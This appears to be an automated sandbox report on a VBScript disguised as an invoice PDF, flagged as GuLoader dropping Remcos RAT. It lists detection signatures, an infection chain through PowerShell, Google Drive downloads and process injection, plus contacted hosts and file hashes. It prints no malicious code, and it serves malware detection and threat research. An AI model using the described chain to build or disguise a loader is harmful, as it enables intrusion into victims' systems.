              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636426 Sample: FAKTURA-P-4526485-274274772... Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 36 2 other IPs or domains 2->36 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 50 6 other signatures 2->50 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 svchost.exe 1 1 2->13         started        16 msiexec.exe 2->16         started        signatures3 process4 dnsIp5 56 VBScript performs obfuscated calls to suspicious functions 8->56 58 Suspicious powershell command line found 8->58 60 Wscript starts Powershell (via cmd or directly) 8->60 70 2 other signatures 8->70 18 powershell.exe 14 20 8->18         started        22 PING.EXE 1 8->22         started        62 Early bird code injection technique detected 11->62 64 Writes to foreign memory regions 11->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 11->66 68 Queues an APC in another process (thread injection) 11->68 24 msiexec.exe 6 11->24         started        26 conhost.exe 11->26         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 dnsIp8 38 drive.usercontent.google.com 172.217.18.1, 443, 49693, 49697 GOOGLEUS United States 18->38 40 drive.google.com 216.58.206.46, 443, 49683, 49690 GOOGLEUS United States 18->40 52 Found suspicious powershell code related to unpacking or dynamic code loading 18->52 28 conhost.exe 18->28         started        30 conhost.exe 22->30         started        54 Detected Remcos RAT 24->54 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs27%VirustotalBrowse
              FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs26%ReversingLabsScript-WScript.Trojan.GuLoader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://drive.google.co0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		high
                edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                		84.201.210.39
                		truefalse
                  		high
                  drive.google.com
                  		216.58.206.46
                  		truefalse
                    		high
                    drive.usercontent.google.com
                    		172.217.18.1
                    		truefalse
                      		high
                      Host_6637.6637.6637.657e
                      		unknown
                      		unknownfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://drive.googpowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/uc?expowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.google.com/upowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000006.00000003.1208404396.000001EDADD80000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.ver)svchost.exe, 00000006.00000002.2260406783.000001EDAE000000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.google.powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.gopowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.goopowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.compowershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.gpowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000006.00000003.1208404396.000001EDADDD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.google.com/ucpowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.googlpowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/uc?epowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.google.compowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.usercontent.google.compowershell.exe, 00000004.00000002.1374187996.000002A9B6C78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.google.cpowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aka.ms/pscore68powershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://apis.google.compowershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/uc?powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.googlepowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive.google.copowershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        216.58.206.46
                                                                                        		drive.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        172.217.18.1
                                                                                        		drive.usercontent.google.comUnited States
                                                                                        		15169GOOGLEUSfalse

                                                                                        Private

                                                                                        IP
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1636426
                                                                                        Start date and time:2025-03-12 19:13:26 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 14s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:21
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:FAKTURA-P-4526485-2742747722-00043067pdf.vbs
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winVBS@13/11@3/3
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 77%
                                                                                        • Number of executed functions: 71
                                                                                        • Number of non-executed functions: 2
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .vbs

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 84.201.210.39, 23.199.214.10, 4.175.87.197
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1232 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6648 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        14:15:03API Interceptor163x Sleep call for process: powershell.exe modified
                                                                                        14:15:09API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        No context

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comInquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.35
                                                                                        Document.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.26
                                                                                        SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.21
                                                                                        Dsyhre- approved on Wednesday March 2025.pdfGet hashmaliciousGabagoolBrowse
                                                                                        • 217.20.57.35
                                                                                        As4o7nvoLu.exeGet hashmaliciousDCRatBrowse
                                                                                        • 217.20.57.36
                                                                                        file_1741726008685.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 84.201.210.37
                                                                                        MyProfessionalResume_Updated.exeGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.19
                                                                                        Set-up.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                        • 84.201.210.39
                                                                                        PO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 217.20.57.35
                                                                                        SOLICITUD DE COTIZACI#U00d3N(UCU) 03-10-2025#U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.34
                                                                                        bg.microsoft.map.fastly.netHAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        Document.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        ORDEM DE COMPRA.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        B32leNmDKJ.exeGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        internalinfrastructuremainoffice-7.0.2317-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 199.232.214.172
                                                                                        svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                        • 199.232.210.172

                                                                                        ASNs

                                                                                        No context

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eaXeuKjNXAK.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        Venom.6.0.3.exeGet hashmaliciousXWormBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        worm xenon___.batGet hashmaliciousXWormBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        File-My-Isekai-Hotel-Build-a-Hotel-and-Create_283939.exeGet hashmaliciousUnknownBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        WizClient.exeGet hashmaliciousXWormBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        TOUR_PACKAGE.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        BBVA S.A.,PDF.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        37f463bf4616ecd445d4a1937da06e19comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        yJLckVp9HE.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        yJLckVp9HE.exeGet hashmaliciousUnknownBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        DTSSymmetryDLL.dll.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        scripthook.zipGet hashmaliciousUnknownBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1
                                                                                        1776871603.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 216.58.206.46
                                                                                        • 172.217.18.1

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7067150137517356
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq2:2JIB/wUKUKQncEmYRTwh0i
                                                                                        MD5:18D9A39793DF078D4C36296099127BA3
                                                                                        SHA1:6E86FE1A27D1739BEE141A30D6F07C84B5ABBD3E
                                                                                        SHA-256:CB73A29A81E94AA00226A53858A7A3B4E3EB8297E08C4B81953B3BC4E413D711
                                                                                        SHA-512:E8567E9EF88F7FEDFD7E719968BDB2770BF422C6AAE83E3F73D62369149A59A197BD02D3635B2AF5F4AEA4401AFCFE03A13E7ABB0CDC0DBB2568AEDD4CD08CF7
                                                                                        Malicious:false
                                                                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x524fff13, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7899824381943227
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
                                                                                        MD5:91E63E7442816DACAE147E6F6DF77180
                                                                                        SHA1:E6E4F02BBBCCD4FBE89E67E56206E6564606B8E6
                                                                                        SHA-256:44AF748FCF5BD941554AABFE5600BC9BF434D2BF1FFFA5E15F3CF20832912D2C
                                                                                        SHA-512:A784C912FE0CF70B2238465DE6433D06BA203009A7D1C153FDB17588BCE5C554C792FF9FED02CA6387B2C008E993B05327DC37F507C2A09F91CB3E9A0B930262
                                                                                        Malicious:false
                                                                                        Preview:RO..... ...............X\...;...{......................0.`.....42...{5......}E.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.....................................V.....}...................T.X.....}c..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08234094854861387
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:CZW8YebMpmYVgGqt/57Dek3JGsc4lallEqW3l/TjzzQ/t:CZW8zbcKHR3tGsc4Amd8/
                                                                                        MD5:AC50DB5BED1392498ECCD8405511072F
                                                                                        SHA1:7DCEC1A74ABAE313F226E29A736054407D600F15
                                                                                        SHA-256:55E6B65E9BCABAF4A2F76FDEE50EA5B7FA1792B51CB973B6A0AA078B49C35A84
                                                                                        SHA-512:6A4A0F9419632C6B54CD6E9AE3105ECDA5C77887DDD459B6FB4DBA9DFD9CEE77B6FB0F2978300C549940D57D2244991225F917241A2B672F8E40E29F2517ED07
                                                                                        Malicious:false
                                                                                        Preview:.r.#.....................................;...{.......}c.42...{5.........42...{5.42...{5...Y.42...{59.................T.X.....}c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.8908305915084105
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulbnolz:NllUc
                                                                                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etohw1ri.e0v.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir5mec2p.hzw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_liohqvqc.igi.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc2z3k3s.3rd.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Roaming\Fugtservietter.Her

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):501772
                                                                                        Entropy (8bit):5.885641682263199
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:dRL+/YiJ8G7PvYLrLc3oIGp0RUQ4niHpG/7x0wqQebSbj8KFenBHk5Dojote67:dRL+/CY3YLrLCo5anJGl0wC+bj8Kvn
                                                                                        MD5:17F8E06BBDA025B74265AF3BFD1C4467
                                                                                        SHA1:64BB7A3E9A0BFE8AE892B01906EA78125A5B215B
                                                                                        SHA-256:02A29850E9C8DE8D57A795B34077CA4740B54055138D3F5F04271B701FD378DC
